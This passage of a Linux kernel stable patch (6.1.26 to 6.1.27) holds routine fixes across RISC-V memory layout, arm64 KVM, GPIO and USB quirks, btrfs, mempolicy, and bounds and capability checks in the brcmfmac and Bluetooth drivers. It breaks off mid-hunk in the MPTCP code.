+diff --git a/Documentation/riscv/vm-layout.rst b/Documentation/riscv/vm-layout.rst
+index 5b36e45fef60b..edb5331287126 100644
+--- a/Documentation/riscv/vm-layout.rst
++++ b/Documentation/riscv/vm-layout.rst
+@@ -47,7 +47,7 @@ RISC-V Linux Kernel SV39
+                                                               | Kernel-space virtual memory, shared between all processes:
+   ____________________________________________________________|___________________________________________________________
+                     |            |                  |         |
+-   ffffffc6fee00000 | -228    GB | ffffffc6feffffff |    2 MB | fixmap
++   ffffffc6fea00000 | -228    GB | ffffffc6feffffff |    6 MB | fixmap
+    ffffffc6ff000000 | -228    GB | ffffffc6ffffffff |   16 MB | PCI io
+    ffffffc700000000 | -228    GB | ffffffc7ffffffff |    4 GB | vmemmap
+    ffffffc800000000 | -224    GB | ffffffd7ffffffff |   64 GB | vmalloc/ioremap space
+@@ -83,7 +83,7 @@ RISC-V Linux Kernel SV48
+                                                               | Kernel-space virtual memory, shared between all processes:
+   ____________________________________________________________|___________________________________________________________
+                     |            |                  |         |
+-   ffff8d7ffee00000 |  -114.5 TB | ffff8d7ffeffffff |    2 MB | fixmap
++   ffff8d7ffea00000 |  -114.5 TB | ffff8d7ffeffffff |    6 MB | fixmap
+    ffff8d7fff000000 |  -114.5 TB | ffff8d7fffffffff |   16 MB | PCI io
+    ffff8d8000000000 |  -114.5 TB | ffff8f7fffffffff |    2 TB | vmemmap
+    ffff8f8000000000 |  -112.5 TB | ffffaf7fffffffff |   32 TB | vmalloc/ioremap space
+diff --git a/Makefile b/Makefile
+index d2eff3747f2f7..a5cfcd0a85a9e 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 26
++SUBLEVEL = 27
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/kvm/mmu.c b/arch/arm64/kvm/mmu.c
+index 019472dd98ff7..54ccdcc2dbdf7 100644
+--- a/arch/arm64/kvm/mmu.c
++++ b/arch/arm64/kvm/mmu.c
+@@ -1178,6 +1178,20 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 		return -EFAULT;
+ 	}
+ 
++	/*
++	 * Permission faults just need to update the existing leaf entry,
++	 * and so normally don't require allocations from the memcache. The
++	 * only exception to this is when dirty logging is enabled at runtime
++	 * and a write fault needs to collapse a block entry into a table.
++	 */
++	if (fault_status != FSC_PERM ||
++	    (logging_active && write_fault)) {
++		ret = kvm_mmu_topup_memory_cache(memcache,
++						 kvm_mmu_cache_min_pages(kvm));
++		if (ret)
++			return ret;
++	}
++
+ 	/*
+ 	 * Let's check if we will get back a huge page backed by hugetlbfs, or
+ 	 * get block mapping for device MMIO region.
+@@ -1234,36 +1248,17 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 		fault_ipa &= ~(vma_pagesize - 1);
+ 
+ 	gfn = fault_ipa >> PAGE_SHIFT;
+-	mmap_read_unlock(current->mm);
+-
+-	/*
+-	 * Permission faults just need to update the existing leaf entry,
+-	 * and so normally don't require allocations from the memcache. The
+-	 * only exception to this is when dirty logging is enabled at runtime
+-	 * and a write fault needs to collapse a block entry into a table.
+-	 */
+-	if (fault_status != FSC_PERM || (logging_active && write_fault)) {
+-		ret = kvm_mmu_topup_memory_cache(memcache,
+-						 kvm_mmu_cache_min_pages(kvm));
+-		if (ret)
+-			return ret;
+-	}
+ 
+-	mmu_seq = vcpu->kvm->mmu_invalidate_seq;
+ 	/*
+-	 * Ensure the read of mmu_invalidate_seq happens before we call
+-	 * gfn_to_pfn_prot (which calls get_user_pages), so that we don't risk
+-	 * the page we just got a reference to gets unmapped before we have a
+-	 * chance to grab the mmu_lock, which ensure that if the page gets
+-	 * unmapped afterwards, the call to kvm_unmap_gfn will take it away
+-	 * from us again properly. This smp_rmb() interacts with the smp_wmb()
+-	 * in kvm_mmu_notifier_invalidate_<page|range_end>.
++	 * Read mmu_invalidate_seq so that KVM can detect if the results of
++	 * vma_lookup() or __gfn_to_pfn_memslot() become stale prior to
++	 * acquiring kvm->mmu_lock.
+ 	 *
+-	 * Besides, __gfn_to_pfn_memslot() instead of gfn_to_pfn_prot() is
+-	 * used to avoid unnecessary overhead introduced to locate the memory
+-	 * slot because it's always fixed even @gfn is adjusted for huge pages.
++	 * Rely on mmap_read_unlock() for an implicit smp_rmb(), which pairs
++	 * with the smp_wmb() in kvm_mmu_invalidate_end().
+ 	 */
+-	smp_rmb();
++	mmu_seq = vcpu->kvm->mmu_invalidate_seq;
++	mmap_read_unlock(current->mm);
+ 
+ 	pfn = __gfn_to_pfn_memslot(memslot, gfn, false, NULL,
+ 				   write_fault, &writable, NULL);
+diff --git a/arch/riscv/include/asm/fixmap.h b/arch/riscv/include/asm/fixmap.h
+index 5c3e7b97fcc6f..0a55099bb7349 100644
+--- a/arch/riscv/include/asm/fixmap.h
++++ b/arch/riscv/include/asm/fixmap.h
+@@ -22,6 +22,14 @@
+  */
+ enum fixed_addresses {
+ 	FIX_HOLE,
++	/*
++	 * The fdt fixmap mapping must be PMD aligned and will be mapped
++	 * using PMD entries in fixmap_pmd in 64-bit and a PGD entry in 32-bit.
++	 */
++	FIX_FDT_END,
++	FIX_FDT = FIX_FDT_END + FIX_FDT_SIZE / PAGE_SIZE - 1,
++
++	/* Below fixmaps will be mapped using fixmap_pte */
+ 	FIX_PTE,
+ 	FIX_PMD,
+ 	FIX_PUD,
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 92ec2d9d7273f..2aeaf8e3a4ab0 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -87,9 +87,13 @@
+ 
+ #define FIXADDR_TOP      PCI_IO_START
+ #ifdef CONFIG_64BIT
+-#define FIXADDR_SIZE     PMD_SIZE
++#define MAX_FDT_SIZE	 PMD_SIZE
++#define FIX_FDT_SIZE	 (MAX_FDT_SIZE + SZ_2M)
++#define FIXADDR_SIZE     (PMD_SIZE + FIX_FDT_SIZE)
+ #else
+-#define FIXADDR_SIZE     PGDIR_SIZE
++#define MAX_FDT_SIZE	 PGDIR_SIZE
++#define FIX_FDT_SIZE	 MAX_FDT_SIZE
++#define FIXADDR_SIZE     (PGDIR_SIZE + FIX_FDT_SIZE)
+ #endif
+ #define FIXADDR_START    (FIXADDR_TOP - FIXADDR_SIZE)
+ 
+diff --git a/arch/riscv/kernel/setup.c b/arch/riscv/kernel/setup.c
+index 86acd690d5293..2acf51c235673 100644
+--- a/arch/riscv/kernel/setup.c
++++ b/arch/riscv/kernel/setup.c
+@@ -278,12 +278,8 @@ void __init setup_arch(char **cmdline_p)
+ #if IS_ENABLED(CONFIG_BUILTIN_DTB)
+ 	unflatten_and_copy_device_tree();
+ #else
+-	if (early_init_dt_verify(__va(XIP_FIXUP(dtb_early_pa))))
+-		unflatten_device_tree();
+-	else
+-		pr_err("No DTB found in kernel mappings\n");
++	unflatten_device_tree();
+ #endif
+-	early_init_fdt_scan_reserved_mem();
+ 	misc_mem_init();
+ 
+ 	init_resources();
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 50a1b6edd4918..6f47ced3175b4 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -57,7 +57,6 @@ unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)]
+ EXPORT_SYMBOL(empty_zero_page);
+ 
+ extern char _start[];
+-#define DTB_EARLY_BASE_VA      PGDIR_SIZE
+ void *_dtb_early_va __initdata;
+ uintptr_t _dtb_early_pa __initdata;
+ 
+@@ -236,31 +235,22 @@ static void __init setup_bootmem(void)
+ 	set_max_mapnr(max_low_pfn - ARCH_PFN_OFFSET);
+ 
+ 	reserve_initrd_mem();
++
++	/*
++	 * No allocation should be done before reserving the memory as defined
++	 * in the device tree, otherwise the allocation could end up in a
++	 * reserved region.
++	 */
++	early_init_fdt_scan_reserved_mem();
++
+ 	/*
+ 	 * If DTB is built in, no need to reserve its memblock.
+ 	 * Otherwise, do reserve it but avoid using
+ 	 * early_init_fdt_reserve_self() since __pa() does
+ 	 * not work for DTB pointers that are fixmap addresses
+ 	 */
+-	if (!IS_ENABLED(CONFIG_BUILTIN_DTB)) {
+-		/*
+-		 * In case the DTB is not located in a memory region we won't
+-		 * be able to locate it later on via the linear mapping and
+-		 * get a segfault when accessing it via __va(dtb_early_pa).
+-		 * To avoid this situation copy DTB to a memory region.
+-		 * Note that memblock_phys_alloc will also reserve DTB region.
+-		 */
+-		if (!memblock_is_memory(dtb_early_pa)) {
+-			size_t fdt_size = fdt_totalsize(dtb_early_va);
+-			phys_addr_t new_dtb_early_pa = memblock_phys_alloc(fdt_size, PAGE_SIZE);
+-			void *new_dtb_early_va = early_memremap(new_dtb_early_pa, fdt_size);
+-
+-			memcpy(new_dtb_early_va, dtb_early_va, fdt_size);
+-			early_memunmap(new_dtb_early_va, fdt_size);
+-			_dtb_early_pa = new_dtb_early_pa;
+-		} else
+-			memblock_reserve(dtb_early_pa, fdt_totalsize(dtb_early_va));
+-	}
++	if (!IS_ENABLED(CONFIG_BUILTIN_DTB))
++		memblock_reserve(dtb_early_pa, fdt_totalsize(dtb_early_va));
+ 
+ 	dma_contiguous_reserve(dma32_phys_limit);
+ 	if (IS_ENABLED(CONFIG_64BIT))
+@@ -279,9 +269,6 @@ pgd_t trampoline_pg_dir[PTRS_PER_PGD] __page_aligned_bss;
+ static pte_t fixmap_pte[PTRS_PER_PTE] __page_aligned_bss;
+ 
+ pgd_t early_pg_dir[PTRS_PER_PGD] __initdata __aligned(PAGE_SIZE);
+-static p4d_t __maybe_unused early_dtb_p4d[PTRS_PER_P4D] __initdata __aligned(PAGE_SIZE);
+-static pud_t __maybe_unused early_dtb_pud[PTRS_PER_PUD] __initdata __aligned(PAGE_SIZE);
+-static pmd_t __maybe_unused early_dtb_pmd[PTRS_PER_PMD] __initdata __aligned(PAGE_SIZE);
+ 
+ #ifdef CONFIG_XIP_KERNEL
+ #define pt_ops			(*(struct pt_alloc_ops *)XIP_FIXUP(&pt_ops))
+@@ -626,9 +613,6 @@ static void __init create_p4d_mapping(p4d_t *p4dp,
+ #define trampoline_pgd_next	(pgtable_l5_enabled ?			\
+ 		(uintptr_t)trampoline_p4d : (pgtable_l4_enabled ?	\
+ 		(uintptr_t)trampoline_pud : (uintptr_t)trampoline_pmd))
+-#define early_dtb_pgd_next	(pgtable_l5_enabled ?			\
+-		(uintptr_t)early_dtb_p4d : (pgtable_l4_enabled ?	\
+-		(uintptr_t)early_dtb_pud : (uintptr_t)early_dtb_pmd))
+ #else
+ #define pgd_next_t		pte_t
+ #define alloc_pgd_next(__va)	pt_ops.alloc_pte(__va)
+@@ -636,7 +620,6 @@ static void __init create_p4d_mapping(p4d_t *p4dp,
+ #define create_pgd_next_mapping(__nextp, __va, __pa, __sz, __prot)	\
+ 	create_pte_mapping(__nextp, __va, __pa, __sz, __prot)
+ #define fixmap_pgd_next		((uintptr_t)fixmap_pte)
+-#define early_dtb_pgd_next	((uintptr_t)early_dtb_pmd)
+ #define create_p4d_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+ #define create_pud_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+ #define create_pmd_mapping(__pmdp, __va, __pa, __sz, __prot) do {} while(0)
+@@ -859,32 +842,28 @@ static void __init create_kernel_page_table(pgd_t *pgdir, bool early)
+  * this means 2 PMD entries whereas for 32-bit kernel, this is only 1 PGDIR
+  * entry.
+  */
+-static void __init create_fdt_early_page_table(pgd_t *pgdir, uintptr_t dtb_pa)
++static void __init create_fdt_early_page_table(pgd_t *pgdir,
++					       uintptr_t fix_fdt_va,
++					       uintptr_t dtb_pa)
+ {
+-#ifndef CONFIG_BUILTIN_DTB
+ 	uintptr_t pa = dtb_pa & ~(PMD_SIZE - 1);
+ 
+-	create_pgd_mapping(early_pg_dir, DTB_EARLY_BASE_VA,
+-			   IS_ENABLED(CONFIG_64BIT) ? early_dtb_pgd_next : pa,
+-			   PGDIR_SIZE,
+-			   IS_ENABLED(CONFIG_64BIT) ? PAGE_TABLE : PAGE_KERNEL);
+-
+-	if (pgtable_l5_enabled)
+-		create_p4d_mapping(early_dtb_p4d, DTB_EARLY_BASE_VA,
+-				   (uintptr_t)early_dtb_pud, P4D_SIZE, PAGE_TABLE);
+-
+-	if (pgtable_l4_enabled)
+-		create_pud_mapping(early_dtb_pud, DTB_EARLY_BASE_VA,
+-				   (uintptr_t)early_dtb_pmd, PUD_SIZE, PAGE_TABLE);
++#ifndef CONFIG_BUILTIN_DTB
++	/* Make sure the fdt fixmap address is always aligned on PMD size */
++	BUILD_BUG_ON(FIX_FDT % (PMD_SIZE / PAGE_SIZE));
+ 
+-	if (IS_ENABLED(CONFIG_64BIT)) {
+-		create_pmd_mapping(early_dtb_pmd, DTB_EARLY_BASE_VA,
++	/* In 32-bit only, the fdt lies in its own PGD */
++	if (!IS_ENABLED(CONFIG_64BIT)) {
++		create_pgd_mapping(early_pg_dir, fix_fdt_va,
++				   pa, MAX_FDT_SIZE, PAGE_KERNEL);
++	} else {
++		create_pmd_mapping(fixmap_pmd, fix_fdt_va,
+ 				   pa, PMD_SIZE, PAGE_KERNEL);
+-		create_pmd_mapping(early_dtb_pmd, DTB_EARLY_BASE_VA + PMD_SIZE,
++		create_pmd_mapping(fixmap_pmd, fix_fdt_va + PMD_SIZE,
+ 				   pa + PMD_SIZE, PMD_SIZE, PAGE_KERNEL);
+ 	}
+ 
+-	dtb_early_va = (void *)DTB_EARLY_BASE_VA + (dtb_pa & (PMD_SIZE - 1));
++	dtb_early_va = (void *)fix_fdt_va + (dtb_pa & (PMD_SIZE - 1));
+ #else
+ 	/*
+ 	 * For 64-bit kernel, __va can't be used since it would return a linear
+@@ -1054,7 +1033,8 @@ asmlinkage void __init setup_vm(uintptr_t dtb_pa)
+ 	create_kernel_page_table(early_pg_dir, true);
+ 
+ 	/* Setup early mapping for FDT early scan */
+-	create_fdt_early_page_table(early_pg_dir, dtb_pa);
++	create_fdt_early_page_table(early_pg_dir,
++				    __fix_to_virt(FIX_FDT), dtb_pa);
+ 
+ 	/*
+ 	 * Bootime fixmap only can handle PMD_SIZE mapping. Thus, boot-ioremap
+@@ -1096,6 +1076,16 @@ static void __init setup_vm_final(void)
+ 	u64 i;
+ 
+ 	/* Setup swapper PGD for fixmap */
++#if !defined(CONFIG_64BIT)
++	/*
++	 * In 32-bit, the device tree lies in a pgd entry, so it must be copied
++	 * directly in swapper_pg_dir in addition to the pgd entry that points
++	 * to fixmap_pte.
++	 */
++	unsigned long idx = pgd_index(__fix_to_virt(FIX_FDT));
++
++	set_pgd(&swapper_pg_dir[idx], early_pg_dir[idx]);
++#endif
+ 	create_pgd_mapping(swapper_pg_dir, FIXADDR_START,
+ 			   __pa_symbol(fixmap_pgd_next),
+ 			   PGDIR_SIZE, PAGE_TABLE);
+diff --git a/arch/x86/Makefile.um b/arch/x86/Makefile.um
+index d2e95d1d4db77..1aa64846e5398 100644
+--- a/arch/x86/Makefile.um
++++ b/arch/x86/Makefile.um
+@@ -3,9 +3,14 @@ core-y += arch/x86/crypto/
+ 
+ #
+ # Disable SSE and other FP/SIMD instructions to match normal x86
++# This is required to work around issues in older LLVM versions, but breaks
++# GCC versions < 11. See:
++# https://gcc.gnu.org/bugzilla/show_bug.cgi?id=99652
+ #
++ifeq ($(CONFIG_CC_IS_CLANG),y)
+ KBUILD_CFLAGS += -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx
+ KBUILD_RUSTFLAGS += -Ctarget-feature=-sse,-sse2,-sse3,-ssse3,-sse4.1,-sse4.2,-avx,-avx2
++endif
+ 
+ ifeq ($(CONFIG_X86_32),y)
+ START := 0x8048000
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index c463173f1fb1a..97ab1468a8760 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -718,7 +718,12 @@ static int really_probe_debug(struct device *dev, struct device_driver *drv)
+ 	calltime = ktime_get();
+ 	ret = really_probe(dev, drv);
+ 	rettime = ktime_get();
+-	pr_debug("probe of %s returned %d after %lld usecs\n",
++	/*
++	 * Don't change this to pr_debug() because that requires
++	 * CONFIG_DYNAMIC_DEBUG and we want a simple 'initcall_debug' on the
++	 * kernel commandline to print this all the time at the debug level.
++	 */
++	printk(KERN_DEBUG "probe of %s returned %d after %lld usecs\n",
+ 		 dev_name(dev), ret, ktime_us_delta(rettime, calltime));
+ 	return ret;
+ }
+diff --git a/drivers/gpio/gpiolib-acpi.c b/drivers/gpio/gpiolib-acpi.c
+index fa3de3c3010ce..787d47e667adb 100644
+--- a/drivers/gpio/gpiolib-acpi.c
++++ b/drivers/gpio/gpiolib-acpi.c
+@@ -1600,6 +1600,19 @@ static const struct dmi_system_id gpiolib_acpi_quirks[] __initconst = {
+ 			.ignore_interrupt = "AMDI0030:00@18",
+ 		},
+ 	},
++	{
++		/*
++		 * Spurious wakeups from TP_ATTN# pin
++		 * Found in BIOS 1.7.8
++		 * https://gitlab.freedesktop.org/drm/amd/-/issues/1722#note_1720627
++		 */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "NL5xNU"),
++		},
++		.driver_data = &(struct acpi_gpiolib_dmi_quirk) {
++			.ignore_wake = "ELAN0415:00@9",
++		},
++	},
+ 	{
+ 		/*
+ 		 * Spurious wakeups from TP_ATTN# pin
+diff --git a/drivers/gpu/drm/drm_fb_helper.c b/drivers/gpu/drm/drm_fb_helper.c
+index 71edb80fe0fb9..06cd2f8c27734 100644
+--- a/drivers/gpu/drm/drm_fb_helper.c
++++ b/drivers/gpu/drm/drm_fb_helper.c
+@@ -1406,6 +1406,9 @@ int drm_fb_helper_check_var(struct fb_var_screeninfo *var,
+ 		return -EINVAL;
+ 	}
+ 
++	var->xres_virtual = fb->width;
++	var->yres_virtual = fb->height;
++
+ 	/*
+ 	 * Workaround for SDL 1.2, which is known to be setting all pixel format
+ 	 * fields values to zero in some cases. We treat this situation as a
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index ea8409e0e70e7..12c4408bbc3b6 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -5888,6 +5888,11 @@ static s32 brcmf_get_assoc_ies(struct brcmf_cfg80211_info *cfg,
+ 		(struct brcmf_cfg80211_assoc_ielen_le *)cfg->extra_buf;
+ 	req_len = le32_to_cpu(assoc_info->req_len);
+ 	resp_len = le32_to_cpu(assoc_info->resp_len);
++	if (req_len > WL_EXTRA_BUF_MAX || resp_len > WL_EXTRA_BUF_MAX) {
++		bphy_err(drvr, "invalid lengths in assoc info: req %u resp %u\n",
++			 req_len, resp_len);
++		return -EINVAL;
++	}
+ 	if (req_len) {
+ 		err = brcmf_fil_iovar_data_get(ifp, "assoc_req_ies",
+ 					       cfg->extra_buf,
+diff --git a/drivers/phy/broadcom/phy-brcm-usb.c b/drivers/phy/broadcom/phy-brcm-usb.c
+index 2bfd78e2d8fd6..7a4c328bac58c 100644
+--- a/drivers/phy/broadcom/phy-brcm-usb.c
++++ b/drivers/phy/broadcom/phy-brcm-usb.c
+@@ -445,9 +445,9 @@ static int brcm_usb_phy_dvr_init(struct platform_device *pdev,
+ 		priv->suspend_clk = NULL;
+ 	}
+ 
+-	priv->wake_irq = platform_get_irq_byname(pdev, "wake");
++	priv->wake_irq = platform_get_irq_byname_optional(pdev, "wake");
+ 	if (priv->wake_irq < 0)
+-		priv->wake_irq = platform_get_irq_byname(pdev, "wakeup");
++		priv->wake_irq = platform_get_irq_byname_optional(pdev, "wakeup");
+ 	if (priv->wake_irq >= 0) {
+ 		err = devm_request_irq(dev, priv->wake_irq,
+ 				       brcm_usb_phy_wake_isr, 0,
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index fc12fee66141f..f05aea57e2d88 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -595,6 +595,11 @@ static void option_instat_callback(struct urb *urb);
+ #define SIERRA_VENDOR_ID			0x1199
+ #define SIERRA_PRODUCT_EM9191			0x90d3
+ 
++/* UNISOC (Spreadtrum) products */
++#define UNISOC_VENDOR_ID			0x1782
++/* TOZED LT70-C based on UNISOC SL8563 uses UNISOC's vendor ID */
++#define TOZED_PRODUCT_LT70C			0x4055
++
+ /* Device flags */
+ 
+ /* Highest interface number which can be used with NCTRL() and RSVD() */
+@@ -2225,6 +2230,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(OPPO_VENDOR_ID, OPPO_PRODUCT_R11, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
+ 	{ } /* Terminating entry */
+ };
+ MODULE_DEVICE_TABLE(usb, option_ids);
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 937b60ae576e0..35e889fe2a95d 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -1658,7 +1658,7 @@ static int get_cur_inode_state(struct send_ctx *sctx, u64 ino, u64 gen)
+ 	int left_ret;
+ 	int right_ret;
+ 	u64 left_gen;
+-	u64 right_gen;
++	u64 right_gen = 0;
+ 	struct btrfs_inode_info info;
+ 
+ 	ret = get_inode_info(sctx->send_root, ino, &info);
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index 67b2aa552d228..099af8ba6fe54 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -2631,7 +2631,7 @@ int btrfs_init_new_device(struct btrfs_fs_info *fs_info, const char *device_path
+ 	struct super_block *sb = fs_info->sb;
+ 	struct rcu_string *name;
+ 	struct btrfs_fs_devices *fs_devices = fs_info->fs_devices;
+-	struct btrfs_fs_devices *seed_devices;
++	struct btrfs_fs_devices *seed_devices = NULL;
+ 	u64 orig_super_total_bytes;
+ 	u64 orig_super_num_devices;
+ 	int ret = 0;
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index f940395667c82..e132f70a059e8 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -784,70 +784,56 @@ static int vma_replace_policy(struct vm_area_struct *vma,
+ 	return err;
+ }
+ 
+-/* Step 2: apply policy to a range and do splits. */
+-static int mbind_range(struct mm_struct *mm, unsigned long start,
+-		       unsigned long end, struct mempolicy *new_pol)
++/* Split or merge the VMA (if required) and apply the new policy */
++static int mbind_range(struct vma_iterator *vmi, struct vm_area_struct *vma,
++		struct vm_area_struct **prev, unsigned long start,
++		unsigned long end, struct mempolicy *new_pol)
+ {
+-	MA_STATE(mas, &mm->mm_mt, start, start);
+-	struct vm_area_struct *prev;
+-	struct vm_area_struct *vma;
+-	int err = 0;
++	struct vm_area_struct *merged;
++	unsigned long vmstart, vmend;
+ 	pgoff_t pgoff;
++	int err;
+ 
+-	prev = mas_prev(&mas, 0);
+-	if (unlikely(!prev))
+-		mas_set(&mas, start);
++	vmend = min(end, vma->vm_end);
++	if (start > vma->vm_start) {
++		*prev = vma;
++		vmstart = start;
++	} else {
++		vmstart = vma->vm_start;
++	}
+ 
+-	vma = mas_find(&mas, end - 1);
+-	if (WARN_ON(!vma))
++	if (mpol_equal(vma_policy(vma), new_pol))
+ 		return 0;
+ 
+-	if (start > vma->vm_start)
+-		prev = vma;
+-
+-	for (; vma; vma = mas_next(&mas, end - 1)) {
+-		unsigned long vmstart = max(start, vma->vm_start);
+-		unsigned long vmend = min(end, vma->vm_end);
+-
+-		if (mpol_equal(vma_policy(vma), new_pol))
+-			goto next;
+-
+-		pgoff = vma->vm_pgoff +
+-			((vmstart - vma->vm_start) >> PAGE_SHIFT);
+-		prev = vma_merge(mm, prev, vmstart, vmend, vma->vm_flags,
+-				 vma->anon_vma, vma->vm_file, pgoff,
+-				 new_pol, vma->vm_userfaultfd_ctx,
+-				 anon_vma_name(vma));
+-		if (prev) {
+-			/* vma_merge() invalidated the mas */
+-			mas_pause(&mas);
+-			vma = prev;
+-			goto replace;
+-		}
+-		if (vma->vm_start != vmstart) {
+-			err = split_vma(vma->vm_mm, vma, vmstart, 1);
+-			if (err)
+-				goto out;
+-			/* split_vma() invalidated the mas */
+-			mas_pause(&mas);
+-		}
+-		if (vma->vm_end != vmend) {
+-			err = split_vma(vma->vm_mm, vma, vmend, 0);
+-			if (err)
+-				goto out;
+-			/* split_vma() invalidated the mas */
+-			mas_pause(&mas);
+-		}
+-replace:
+-		err = vma_replace_policy(vma, new_pol);
++	pgoff = vma->vm_pgoff + ((vmstart - vma->vm_start) >> PAGE_SHIFT);
++	merged = vma_merge(vma->vm_mm, *prev, vmstart, vmend, vma->vm_flags,
++			   vma->anon_vma, vma->vm_file, pgoff, new_pol,
++			   vma->vm_userfaultfd_ctx, anon_vma_name(vma));
++	if (merged) {
++		*prev = merged;
++		/* vma_merge() invalidated the mas */
++		mas_pause(&vmi->mas);
++		return vma_replace_policy(merged, new_pol);
++	}
++
++	if (vma->vm_start != vmstart) {
++		err = split_vma(vma->vm_mm, vma, vmstart, 1);
+ 		if (err)
+-			goto out;
+-next:
+-		prev = vma;
++			return err;
++		/* split_vma() invalidated the mas */
++		mas_pause(&vmi->mas);
+ 	}
+ 
+-out:
+-	return err;
++	if (vma->vm_end != vmend) {
++		err = split_vma(vma->vm_mm, vma, vmend, 0);
++		if (err)
++			return err;
++		/* split_vma() invalidated the mas */
++		mas_pause(&vmi->mas);
++	}
++
++	*prev = vma;
++	return vma_replace_policy(vma, new_pol);
+ }
+ 
+ /* Set the process memory policy */
+@@ -1259,6 +1245,8 @@ static long do_mbind(unsigned long start, unsigned long len,
+ 		     nodemask_t *nmask, unsigned long flags)
+ {
+ 	struct mm_struct *mm = current->mm;
++	struct vm_area_struct *vma, *prev;
++	struct vma_iterator vmi;
+ 	struct mempolicy *new;
+ 	unsigned long end;
+ 	int err;
+@@ -1328,7 +1316,13 @@ static long do_mbind(unsigned long start, unsigned long len,
+ 		goto up_out;
+ 	}
+ 
+-	err = mbind_range(mm, start, end, new);
++	vma_iter_init(&vmi, mm, start);
++	prev = vma_prev(&vmi);
++	for_each_vma_range(vmi, vma, end) {
++		err = mbind_range(&vmi, vma, &prev, start, end, new);
++		if (err)
++			break;
++	}
+ 
+ 	if (!err) {
+ 		int nr_failed = 0;
+@@ -1489,10 +1483,8 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		unsigned long, home_node, unsigned long, flags)
+ {
+ 	struct mm_struct *mm = current->mm;
+-	struct vm_area_struct *vma;
++	struct vm_area_struct *vma, *prev;
+ 	struct mempolicy *new;
+-	unsigned long vmstart;
+-	unsigned long vmend;
+ 	unsigned long end;
+ 	int err = -ENOENT;
+ 	VMA_ITERATOR(vmi, mm, start);
+@@ -1521,9 +1513,8 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 	if (end == start)
+ 		return 0;
+ 	mmap_write_lock(mm);
++	prev = vma_prev(&vmi);
+ 	for_each_vma_range(vmi, vma, end) {
+-		vmstart = max(start, vma->vm_start);
+-		vmend   = min(end, vma->vm_end);
+ 		new = mpol_dup(vma_policy(vma));
+ 		if (IS_ERR(new)) {
+ 			err = PTR_ERR(new);
+@@ -1547,7 +1538,7 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		}
+ 
+ 		new->home_node = home_node;
+-		err = mbind_range(mm, vmstart, vmend, new);
++		err = mbind_range(&vmi, vma, &prev, start, end, new);
+ 		mpol_put(new);
+ 		if (err)
+ 			break;
+diff --git a/net/bluetooth/hci_sock.c b/net/bluetooth/hci_sock.c
+index 06581223238c5..f597fe0db9f8f 100644
+--- a/net/bluetooth/hci_sock.c
++++ b/net/bluetooth/hci_sock.c
+@@ -1003,7 +1003,14 @@ static int hci_sock_ioctl(struct socket *sock, unsigned int cmd,
+ 	if (hci_sock_gen_cookie(sk)) {
+ 		struct sk_buff *skb;
+ 
+-		if (capable(CAP_NET_ADMIN))
++		/* Perform careful checks before setting the HCI_SOCK_TRUSTED
++		 * flag. Make sure that not only the current task but also
++		 * the socket opener has the required capability, since
++		 * privileged programs can be tricked into making ioctl calls
++		 * on HCI sockets, and the socket should not be marked as
++		 * trusted simply because the ioctl caller is privileged.
++		 */
++		if (sk_capable(sk, CAP_NET_ADMIN))
+ 			hci_sock_set_flag(sk, HCI_SOCK_TRUSTED);
+ 
+ 		/* Send event to monitor */
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index b1bbb0b75a13c..ea46a5cb1c30f 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2330,7 +2330,26 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 			      unsigned int flags)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+-	bool need_push, dispose_it;
